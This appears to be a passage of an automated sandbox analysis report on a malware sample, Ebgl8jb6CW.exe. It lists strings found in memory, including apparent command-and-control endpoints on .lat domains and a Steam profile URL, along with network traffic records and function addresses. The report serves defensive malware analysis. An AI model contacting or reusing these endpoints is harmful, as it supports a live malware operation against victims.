Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/api
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875627830.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900d
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://talkynicer.lat:443/apii
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tentabatte.lat:443/api&
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: Ebgl8jb6CW.exe	Static PE information: section name:
Source: Ebgl8jb6CW.exe	Static PE information: section name: .idata
Source: Ebgl8jb6CW.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017B100	0_2_0017B100
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00178600	0_2_00178600
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F8015	0_2_001F8015
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D100D	0_2_001D100D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018D003	0_2_0018D003
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021703E	0_2_0021703E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017D021	0_2_0017D021
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EE024	0_2_001EE024
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D6021	0_2_001D6021
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00211053	0_2_00211053
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0044D031	0_2_0044D031
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00208056	0_2_00208056
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019C09E	0_2_0019C09E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB	0_2_0022E0AB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002200B4	0_2_002200B4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EB085	0_2_001EB085
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FE0AD	0_2_001FE0AD
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DA0D0	0_2_001DA0D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019A0CA	0_2_0019A0CA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DE0C4	0_2_001DE0C4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002130FC	0_2_002130FC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002120C4	0_2_002120C4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002070C6	0_2_002070C6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001860E9	0_2_001860E9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002300D1	0_2_002300D1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E70E8	0_2_001E70E8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FC0E4	0_2_001FC0E4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019C0E6	0_2_0019C0E6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EC118	0_2_001EC118
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F910A	0_2_001F910A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020E135	0_2_0020E135
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D213E	0_2_001D213E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022A106	0_2_0022A106
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00321117	0_2_00321117
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020410D	0_2_0020410D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022810F	0_2_0022810F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020A114	0_2_0020A114
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019C09E	0_2_0019C09E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F1158	0_2_001F1158
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00188169	0_2_00188169
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DD168	0_2_001DD168
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00176160	0_2_00176160
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D1163	0_2_001D1163
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DB19B	0_2_001DB19B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F7193	0_2_001F7193
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002181B1	0_2_002181B1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AF18B	0_2_001AF18B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019E180	0_2_0019E180
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D8183	0_2_001D8183
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D41B3	0_2_001D41B3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00217195	0_2_00217195
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001991AE	0_2_001991AE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020F1E3	0_2_0020F1E3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021A1E5	0_2_0021A1E5
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F41D4	0_2_001F41D4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EF1D3	0_2_001EF1D3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001981CC	0_2_001981CC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DC1F5	0_2_001DC1F5
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022922C	0_2_0022922C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E6208	0_2_001E6208
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00216215	0_2_00216215
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018E220	0_2_0018E220
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00416278	0_2_00416278
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00181227	0_2_00181227
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020D262	0_2_0020D262
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FD257	0_2_001FD257
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022C26F	0_2_0022C26F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00209275	0_2_00209275
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020127D	0_2_0020127D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00226243	0_2_00226243
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00174270	0_2_00174270
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E9273	0_2_001E9273
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DB26E	0_2_001DB26E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022D256	0_2_0022D256
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E8269	0_2_001E8269
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E2262	0_2_001E2262
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A9280	0_2_001A9280
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020C28E	0_2_0020C28E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001942D0	0_2_001942D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0032D2E0	0_2_0032D2E0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F02C8	0_2_001F02C8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EA2E5	0_2_001EA2E5
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00179310	0_2_00179310
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021D334	0_2_0021D334
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00225337	0_2_00225337
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021133E	0_2_0021133E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00222317	0_2_00222317
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020B31A	0_2_0020B31A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D3323	0_2_001D3323
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00208360	0_2_00208360
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00215361	0_2_00215361
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0023136E	0_2_0023136E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019D34A	0_2_0019D34A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00337366	0_2_00337366
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00191340	0_2_00191340
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D7377	0_2_001D7377
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019F377	0_2_0019F377
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021E359	0_2_0021E359
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022D35C	0_2_0022D35C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E33B4	0_2_001E33B4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D93A4	0_2_001D93A4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001983D8	0_2_001983D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001773D0	0_2_001773D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002233EB	0_2_002233EB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017F3C0	0_2_0017F3C0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002273FC	0_2_002273FC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002193C8	0_2_002193C8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FF40B	0_2_001FF40B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0033C424	0_2_0033C424
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F8408	0_2_001F8408
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021B412	0_2_0021B412
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022A41D	0_2_0022A41D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FA457	0_2_001FA457
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00197440	0_2_00197440
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AA440	0_2_001AA440
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0033046D	0_2_0033046D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018747D	0_2_0018747D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E747B	0_2_001E747B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001B0460	0_2_001B0460
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020C4A1	0_2_0020C4A1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021C4AD	0_2_0021C4AD
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D54C3	0_2_001D54C3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001904C6	0_2_001904C6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D64FC	0_2_001D64FC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017D4F3	0_2_0017D4F3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EF4F6	0_2_001EF4F6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DA4F6	0_2_001DA4F6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002244DA	0_2_002244DA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001924E0	0_2_001924E0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002044DA	0_2_002044DA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D151F	0_2_001D151F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EF50D	0_2_001EF50D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001ED506	0_2_001ED506
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019C53C	0_2_0019C53C
